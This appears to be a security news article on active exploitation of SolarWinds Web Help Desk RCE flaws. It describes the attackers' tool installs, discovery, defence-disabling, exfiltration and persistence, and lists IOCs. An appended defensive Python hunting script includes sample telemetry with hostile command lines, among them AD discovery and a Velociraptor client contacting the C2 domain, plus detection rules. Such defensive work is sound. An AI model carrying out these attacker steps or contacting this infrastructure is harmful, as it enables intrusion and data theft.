Critical remote code execution (RCE) vulnerabilities in SolarWinds Web Help Desk (WHD) are being actively targeted by cyber threat actors. On February 7, 2026, the security company Huntress disclosed active exploitation in three customer environments.

In order to gain persistent access, attackers use these vulnerabilities to install programs such as Velociraptor and Zoho Assist.

Overview of Vulnerabilities

WHD, a widely deployed IT help desk tool that runs on Tomcat, is affected by untrusted deserialization bugs. These allow unauthenticated RCE, meaning an attacker can execute code without any login credentials. Versions prior to 12.8.7 HF1 (or 2026.1) are vulnerable; CISA has added CVE-2025-40551 to its Known Exploited Vulnerabilities (KEV) catalog.

Timeline for Help Desk Attacks

The exploit chain begins with wrapper.exe spawning java.exe, after which cmd.exe retrieves an MSI for Zoho ManageEngine RMM (TOOLSIQ.EXE) from Catbox. This gives the attacker remote control through an account tied to a Proton Mail address.

The attackers then install the Velociraptor 0.73.4 MSI from Supabase and perform AD discovery using "net group 'domain computers' /domain". Next they install Cloudflared for tunnelling, disable Defender and the Windows Firewall through registry edits, and exfiltrate system information (collected with Get-ComputerInfo) to Elastic Cloud on GCP. A failover script, triggered by HTTP 406 responses, moves the Velociraptor C2 from Cloudflare Workers to v2-api.mooo.com.

Persistence includes QEMU-based SSH backdoors launched through scheduled tasks such as TPMProfiler.

CVE ID           CVSS Score   Description                       Status
CVE-2025-40551   Critical     Untrusted deserialization RCE     Actively exploited; CISA KEV
CVE-2025-26399   Critical     Untrusted deserialization RCE     Patch needed
CVE-2025-40536   High         Related deserialization flaw      Actively exploited

Huntress monitors 84 endpoints running WHD across 78 organizations. On February 6, Microsoft confirmed similar activity.

Attackers combine legitimate tools like Velociraptor (DFIR) for C2 with Elastic to create custom SIEMs for victim triage. Update right away to SolarWinds WHD 2026.1 or later. Block public access and conceal admin interfaces behind firewalls and VPNs.

Hunt for the published IOCs: the Velociraptor server auth.qgtxtebl.workers.dev and the Zoho MSI (SHA256: 897eae49e6c32de3f4bfa229ad4f2d6e56bcf7a39c6c962d02e5c85cd538a189). Reset credentials, check for unexpected RMM tools, and watch for child processes spawned by java.exe. Organizations need to move quickly to stop these attacks; Huntress and vendors such as Microsoft recommend patching and reviewing network exposure.
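The following added example (not code from the article, Huntress, or SolarWinds) shows how a defender can turn the exploit chain and IOCs above into hunting rules over process-creation telemetry. It flags java.exe spawning a shell or installer (with wrapper.exe as the grandparent, the WHD/Tomcat service chain), the AD discovery command quoted in the article, and matches on the published C2 domain and MSI hash. The log format and every event in SAMPLE_EVENTS are constructed for illustration; only the two domains, the hash, the file name TOOLSIQ.EXE and the net group command come from the article.

```python
"""Hunting rules for the SolarWinds WHD exploitation chain (added example).

Events are constructed Sysmon-style process-creation records in a simple
key="value" format; real deployments would read from an EDR or SIEM instead.
"""
import re
from dataclasses import dataclass

# IOCs published in the article (C2 domains and the Zoho MSI hash).
IOC_DOMAINS = {"auth.qgtxtebl.workers.dev", "v2-api.mooo.com"}
IOC_SHA256 = {"897eae49e6c32de3f4bfa229ad4f2d6e56bcf7a39c6c962d02e5c85cd538a189"}

# A Tomcat-hosted WHD java.exe has no business launching these.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "msiexec.exe"}

# Matches: net group 'domain computers' /domain (quotes optional, case-insensitive)
AD_DISCOVERY_RE = re.compile(r"group\s+['\"]?domain computers['\"]?\s+/domain", re.I)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable base name, lower-cased
    cmdline: str
    sha256: str = ""


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed key="value" process-creation line."""
    fields = dict(re.findall(r'(\w+)="([^"]*)"', line))
    return ProcEvent(
        pid=int(fields["pid"]),
        ppid=int(fields["ppid"]),
        image=fields["image"].lower(),
        cmdline=fields["cmdline"],
        sha256=fields.get("sha256", "").lower(),
    )


def hunt(lines):
    """Return (pid, reason) findings for every rule that fires."""
    events = [parse_event(l) for l in lines]
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        # Rule 1: java.exe spawning a shell/installer; note whether wrapper.exe is the grandparent.
        if parent and parent.image == "java.exe" and e.image in SUSPICIOUS_CHILDREN:
            gp = by_pid.get(parent.ppid)
            ctx = "under wrapper.exe" if gp and gp.image == "wrapper.exe" else "grandparent unknown"
            findings.append((e.pid, f"java.exe spawned {e.image} ({ctx})"))
        # Rule 2: published C2 / failover domains appearing in any command line.
        for dom in IOC_DOMAINS:
            if dom in e.cmdline.lower():
                findings.append((e.pid, f"IOC domain {dom}"))
        # Rule 3: published SHA256 of the Zoho MSI.
        if e.sha256 in IOC_SHA256:
            findings.append((e.pid, "IOC SHA256 match (Zoho MSI)"))
        # Rule 4: the AD discovery command quoted in the article.
        if e.image in {"net.exe", "net1.exe"} and AD_DISCOVERY_RE.search(e.cmdline):
            findings.append((e.pid, "AD discovery: net group 'domain computers' /domain"))
    return findings


# Constructed sample telemetry: a WHD service chain, two suspicious children,
# discovery, a C2 contact, and one benign process that must not fire.
SAMPLE_EVENTS = [
    'pid="400" ppid="1"   image="wrapper.exe"  cmdline="wrapper.exe -s whd.conf"',
    'pid="410" ppid="400" image="java.exe"     cmdline="java.exe -Dcatalina.base=C:\\WHD org.apache.catalina.startup.Bootstrap"',
    'pid="420" ppid="410" image="cmd.exe"      cmdline="cmd.exe /c start TOOLSIQ.EXE"',
    'pid="430" ppid="410" image="msiexec.exe"  cmdline="msiexec.exe /i TOOLSIQ.EXE /qn" '
    'sha256="897EAE49E6C32DE3F4BFA229AD4F2D6E56BCF7A39C6C962D02E5C85CD538A189"',
    'pid="500" ppid="900" image="net.exe"      cmdline="net group \'domain computers\' /domain"',
    'pid="600" ppid="900" image="velociraptor.exe" cmdline="velociraptor.exe --server https://auth.qgtxtebl.workers.dev"',
    'pid="700" ppid="900" image="explorer.exe" cmdline="explorer.exe"',
]

if __name__ == "__main__":
    for pid, reason in hunt(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason}")
```

The parent/grandparent lookup is what makes rule 1 useful: java.exe spawning cmd.exe is noisy across an estate, but java.exe whose parent is the WHD service wrapper narrows it to the exact chain the article describes. The hash comparison lower-cases both sides because EDR products disagree on hex case.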